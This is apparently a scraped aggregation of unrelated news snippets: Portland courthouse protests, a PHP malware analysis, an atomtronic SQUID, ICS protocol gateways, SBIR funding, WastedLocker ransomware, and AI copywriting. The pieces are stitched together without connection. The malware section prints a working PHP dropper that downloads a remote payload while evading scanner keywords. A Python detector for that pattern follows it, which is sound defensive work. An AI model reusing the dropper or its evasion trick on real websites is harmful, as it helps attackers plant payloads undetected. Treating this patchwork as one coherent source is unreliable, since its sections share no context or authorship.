Portland Riots Read-out: August 7

Bottom line:

Activity in the vicinity of the Mark O. Hatfield Federal Courthouse once again remained peaceful – in sharp contrast to the violent nightly siege of previous weeks. Thursday evening marked a fifth consecutive night with zero attacks directed at federal officers or federal property. The change is directly attributable to the long-awaited cooperation from state and local law enforcement, which began last week, but should have been the case all along. 

PHP Binary Downloader

When possible, an attacker will want to avoid using specific functions in their PHP code that they know are more likely to be flagged by a scanner. Some examples of suspicious functions commonly detected include system and file_put_contents.

In this malware dropper file we recently found on a compromised website, the attacker chose to create a user-defined PHP function, getFile, to accomplish the same task as file_put_contents. Their objective is essentially to download and store binary data from a third-party resource without being detected.

function getFile($url, $path) {
    $newfname = $path;
    $file = fopen ($url, 'rb');
    if ($file) {
        $newf = fopen ($newfname, 'wb');
        if ($newf) {
            while(!feof($file)) {
                fwrite($newf, fread($file, 1024 * 8), 1024 * 8);
            }
        }
    }
    if ($file) { fclose($file); }
    if ($newf) { fclose($newf); }
}
getFile("hxxp://[redacted]/payload.zip","ss.zip");
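Because the dropper never calls file_put_contents, a name blocklist misses it; the copy behaviour is still visible. The scanner below is an added example (not from the original post or any product): it flags a read-mode fopen handle being piped into a write-mode one. The names scan, DROPPER and BENIGN and the regex heuristics are assumptions, and both samples are constructed.

```python
import re

# Constructed sample: the dropper from the post; the URL stays defanged as on the page.
DROPPER = r'''
function getFile($url, $path) { $newfname = $path; $file = fopen ($url, 'rb');
if ($file) { $newf = fopen ($newfname, 'wb'); if ($newf) { while(!feof($file)) {
fwrite($newf, fread($file, 1024 * 8), 1024 * 8); }}}
if ($file) { fclose($file); } if ($newf) { fclose($newf); }}
getFile("hxxp://[redacted]/payload.zip","ss.zip");
'''

# Constructed benign sample: reads a local file into a string, writes nothing.
BENIGN = r'''
function tailLog($p) { $h = fopen($p, 'rb'); $out = '';
while (!feof($h)) { $out .= fread($h, 4096); } fclose($h); return $out; }
'''

# $handle = fopen(<source>, '<mode>')
FOPEN = re.compile(r"(\$\w+)\s*=\s*fopen\s*\(\s*([^,]+?)\s*,\s*['\"]([^'\"]+)['\"]", re.I)
FREAD = re.compile(r"\b(?:fread|fgets|stream_get_contents)\s*\(\s*(\$\w+)", re.I)
FWRITE = re.compile(r"\b(?:fwrite|fputs)\s*\(\s*(\$\w+)", re.I)
# URL literal, including the defanged hxxp form used in write-ups.
REMOTE = re.compile(r"[\"'](?:https?|hxxps?|ftp)://", re.I)

def scan(src):
    """Return findings for stream-copy behaviour in a PHP source string."""
    readers, writers = set(), set()
    for var, _source, mode in FOPEN.findall(src):
        # The fopen mode decides the handle's role: 'r...' is a source, anything else a sink.
        (readers if mode[0].lower() == "r" else writers).add(var)
    read_from = set(FREAD.findall(src)) & readers
    written_to = set(FWRITE.findall(src)) & writers
    findings = []
    if read_from and written_to:
        findings.append("stream-copy: read handle piped into write handle")
        if REMOTE.search(src):
            findings.append("remote-source: URL literal in a file that stream-copies")
    return findings

if __name__ == "__main__":
    for name, sample in (("dropper", DROPPER), ("benign", BENIGN)):
        print(name, scan(sample))
```

A file-level heuristic like this will also fire on legitimate updaters and backup scripts, so treat a hit as a triage signal to review alongside file location and modification time.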

Friday Squid Blogging: New SQUID

There’s a new SQUID:

A new device that relies on flowing clouds of ultracold atoms promises potential tests of the intersection between the weirdness of the quantum world and the familiarity of the macroscopic world we experience every day. The atomtronic Superconducting QUantum Interference Device (SQUID) is also potentially useful for ultrasensitive rotation measurements and as a component in quantum computers.

Protocol gateway flaws reveal a weak point in ICS environments

Security researchers warn about widespread vulnerabilities in protocol gateways, small devices that connect industrial machinery and sensors to TCP/IP networks that are used to automate and control them. New research published this week by Trend Micro and presented at the Black Hat USA virtual security conference highlights a new threat via protocol translation attacks and reveals 9 flaws found in protocol gateways from different vendors.

How to access ‘America’s Seed Fund,’ the $3 billion SBIR program

One of the best-kept secrets in the world of capital is that the federal government has billions of dollars it’s dying to give away to early-stage founders and inventors — and all you have to do is ask. Well, there’s a bit more to it than that, so here’s a guide to getting in the door of the massive Small Business Innovation Research program.

Morphisec Knowledge Update: New WastedLocker Ransomware Causes Havoc Among Some of the Leading Enterprises in the U.S.

Garmin has confirmed that the recent outage its users experienced was indeed the result of a successful ransomware attack. However, the extent of the damage done is still unclear. The attack, which compromised Garmin’s servers for five days, impacted millions of users globally and will likely end up costing Garmin millions of dollars in lost productivity and reputation alone. While Garmin says that no customer data was leaked, Garmin’s call centers, web site, and cloud-based services such as Garmin Connect and FlyGarmin (a commercial aviation navigation service) were either taken offline or negatively impacted as a result of the attack.

Hypotenuse AI wants to take the strain out of copywriting for e-commerce

Imagine buying a dress online because a piece of code sold you on its ‘flattering, feminine flair’ — or convinced you ‘romantic floral details’ would outline your figure with ‘timeless style’. The very same day your friend buys the same dress from the same website but she’s sold on a description of ‘vibrant tones’, ‘fresh cotton feel’ and ‘statement sleeves’.

This Week in Security News: Robots Running the Industrial World Are Open to Cyber Attacks and Industrial Protocol Translation Gone Wrong

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. Based on research that Trend Micro released during Black Hat USA this past week, read about how some industrial robots have flaws that could make them vulnerable to advanced hackers, as well as the risks related to protocol gateways and how to secure these devices.